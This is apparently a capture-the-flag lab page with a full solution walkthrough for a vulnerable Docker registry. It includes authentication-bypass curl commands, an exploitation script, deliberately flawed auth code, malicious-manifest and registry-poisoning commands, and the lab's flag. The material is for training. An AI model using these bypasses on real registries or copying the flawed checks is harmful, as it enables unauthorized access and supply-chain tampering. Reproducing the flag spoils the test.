Avatar

Labs / Registry Hijacker

  • Challenge
  • Released 09 Sep 2025

🐳 Can you hijack this Docker registry and extract its hidden secrets?

A Docker registry management platform implements the Registry API v2 with enterprise security features for container image storage and distribution. But when authentication mechanisms meet implementation flaws, even the most secure registries can leak their most sensitive layers and manifests. 🎯 Time to test your container registry exploitation skills!

1
Flags
1
Points
Challenge
Solution Available
Pro Exclusive
Start Lab Environment
~1-2 min setup
AWS dedicated
Private instance
Industry standard
Challenge

🐳 Registry Hijacker - Complete Step-by-Step Exploitation Guide

Challenge Objective: Exploit multiple Docker Registry API v2 vulnerabilities to bypass authentication, access restricted admin panels, and extract the hidden flag from sensitive registry data through various attack vectors.
📋 Quick Solution Summary
Fastest Path to Flag:
curl <target-ip>/v2/secure-app/blobs/sha256:secret-layer
Alternative: Login as user:password123 → Access /registry-admin?admin=true
🔍 Step 1: Understanding Docker Registry API v2

Docker Registry API v2 is the standard protocol for storing and distributing Docker images. It uses a RESTful API with endpoints for manifests, blobs, and catalog operations. Common vulnerabilities include weak authentication, missing access controls, and information disclosure.

Key Registry API Endpoints:
/v2/ - Registry root (version check)
/v2/_catalog - List all repositories
/v2/{repo}/tags/list - List tags for repository
/v2/{repo}/manifests/{tag} - Get/Put image manifest
/v2/{repo}/blobs/{digest} - Get blob data
🔍 Step 2: Initial Application Analysis

Navigate to to access the SecureRegistry Hub. The application provides a Docker registry management interface with the following features:

  • Web Interface: Registry dashboard and information panels
  • Registry API: Docker Registry API v2 endpoints
  • Authentication: Basic auth for both web and API access
  • Admin Panel: Administrative functions (restricted access)

Test Credentials:

  • Username: user | Password: password123
  • Username: admin | Password: admin123
🔍 Step 3: Registry API Reconnaissance

Start by exploring the Docker Registry API endpoints without authentication:

Basic API Discovery
# Check registry version
curl /v2/

# List repositories (should require auth)
curl /v2/_catalog

# Expected: Unauthorized or repository list
Repository Enumeration
# List tags for secure-app repository
curl /v2/secure-app/tags/list

# Get manifest for latest tag
curl /v2/secure-app/manifests/latest
🔍 Step 4: Authentication Bypass Discovery

The registry implements vulnerable authentication that can be bypassed:

Authentication Bypass Techniques:
1. Empty Password Bypass: username: (colon with empty password)
2. Header Bypass: X-Registry-Auth: bypass
3. Admin Access Bypass: X-Admin-Access: granted
🔍 Step 5: Exploiting Authentication Bypass
Method 1: Basic Auth Bypass
# Create malformed basic auth
echo -n "admin:" | base64
# Result: YWRtaW46

# Use bypassed auth
curl -H "Authorization: Basic YWRtaW46" /v2/_catalog
Method 2: Header Bypass
# Bypass using special header
curl -H "X-Registry-Auth: bypass" /v2/_catalog

# Access admin functions
curl -H "X-Admin-Access: granted" /registry-admin
🔍 Step 6: Repository and Manifest Exploration

Once authentication is bypassed, explore the registry contents:

# List all repositories
curl -H "Authorization: Basic YWRtaW46" /v2/_catalog

# Expected response:
{"repositories": ["secure-app"]}

# List tags for secure-app
curl /v2/secure-app/tags/list

# Expected response:
{"name": "secure-app", "tags": ["v1.0", "latest"]}

# Get manifest for latest tag
curl /v2/secure-app/manifests/latest
🔍 Step 7: Blob and Layer Analysis

Examine the image manifest to identify blob digests and layers:

Manifest Analysis
# The manifest reveals layers:
{
"layers": [
{"digest": "sha256:layer1"},
{"digest": "sha256:layer2"},
{"digest": "sha256:secret-layer"}
]
}
Blob Access
# Access blob data directly
curl /v2/secure-app/blobs/sha256:secret-layer

# This should contain the flag
# 354facca-2ae0-4eef-8e2f-042f0c8a22d2
🔍 Step 8: Flag Extraction via Blob Access

The flag is stored in the secret layer blob:

Flag Extraction Command:
curl /v2/secure-app/blobs/sha256:secret-layer

Expected Response:

354facca-2ae0-4eef-8e2f-042f0c8a22d2
🔍 Step 9: Alternative Admin Panel Access

You can also access the flag through the admin panel bypass:

Web Interface Method
  1. Login with user:password123
  2. Navigate to /registry-admin
  3. Add URL parameter: ?admin=true
  4. Or add header: X-Admin-Access: granted
  5. The flag appears in the secret data section
Direct API Method
# Access admin panel directly
curl -b cookies.txt -H "X-Admin-Access: granted" /registry-admin

# Look for flag in JSON response
🔍 Step 10: Complete Exploitation Script
#!/bin/bash

TARGET=""

# Method 1: Direct blob access
echo "[+] Attempting direct blob access..."
FLAG=$(curl -s "$TARGET/v2/secure-app/blobs/sha256:secret-layer")
echo "Flag from blob: $FLAG"

# Method 2: Authentication bypass
echo "[+] Attempting auth bypass..."
AUTH=$(echo -n "admin:" | base64)
curl -s -H "Authorization: Basic $AUTH" "$TARGET/v2/_catalog"

# Method 3: Admin panel bypass
echo "[+] Attempting admin panel access..."
curl -s -H "X-Admin-Access: granted" "$TARGET/registry-admin" | grep -o '[0-9a-f-]\{36\}'
🔍 Step 11: Understanding the Vulnerabilities
Authentication Bypass
# VULNERABLE: Weak auth validation
if ':' in decoded and decoded.endswith(':'):
return decoded.split(':')[0]

# Allows empty password authentication
Access Control Bypass
# VULNERABLE: Header-based bypass
is_admin = (session['user'] == 'admin' or
request.args.get('admin') == 'true' or
request.headers.get('X-Admin-Access') == 'granted')
🔍 Step 12: Registry Security Analysis

The vulnerabilities exist because:

  • Weak Authentication: Basic auth parsing allows empty passwords
  • Missing Access Controls: Registry API endpoints lack proper authentication
  • Header Injection: Custom headers can bypass security checks
  • Information Disclosure: Sensitive data accessible without authorization
  • Direct Object Access: Blob digests can be accessed directly
🔍 Step 13: Advanced Exploitation Techniques
Manifest Manipulation
# Upload malicious manifest
curl -X PUT -H "X-Registry-Auth: bypass" \
-H "Content-Type: application/json" \
-d '{"layers":[{"digest":"sha256:malicious"}]}' \
/v2/secure-app/manifests/evil
Layer Enumeration
# Enumerate all layers
for layer in layer1 layer2 secret-layer; do
curl /v2/secure-app/blobs/sha256:$layer
done
Registry Poisoning
# Poison registry catalog
curl -X PUT -H "X-Registry-Auth: bypass" \
/v2/malicious-repo/manifests/latest
🔍 Step 14: Security Implications

Docker Registry vulnerabilities can lead to:

  • Image Tampering: Modification of container images and manifests
  • Secret Extraction: Access to sensitive data stored in image layers
  • Supply Chain Attacks: Injection of malicious images into the registry
  • Privilege Escalation: Gaining administrative access to registry functions
  • Data Exfiltration: Downloading private container images and secrets
  • Registry Poisoning: Uploading malicious images to compromise deployments
🔍 Step 15: Remediation Strategies

To secure Docker registries:

  • Strong Authentication: Implement proper token-based authentication (JWT)
  • Access Control: Use role-based access control (RBAC) for registry operations
  • Input Validation: Validate all API inputs and headers
  • Network Security: Use TLS encryption and network segmentation
  • Image Scanning: Implement vulnerability scanning for stored images
  • Audit Logging: Log all registry operations and access attempts
  • Secrets Management: Use proper secrets management instead of storing secrets in layers
Flag Location: The flag 354facca-2ae0-4eef-8e2f-042f0c8a22d2 is accessible via direct blob access at /v2/secure-app/blobs/sha256:secret-layer or through the admin panel using access control bypass techniques.
Real-World Application: This challenge demonstrates realistic Docker Registry API vulnerabilities commonly found in private container registries where weak authentication and missing access controls can lead to unauthorized access to sensitive container images and proprietary code.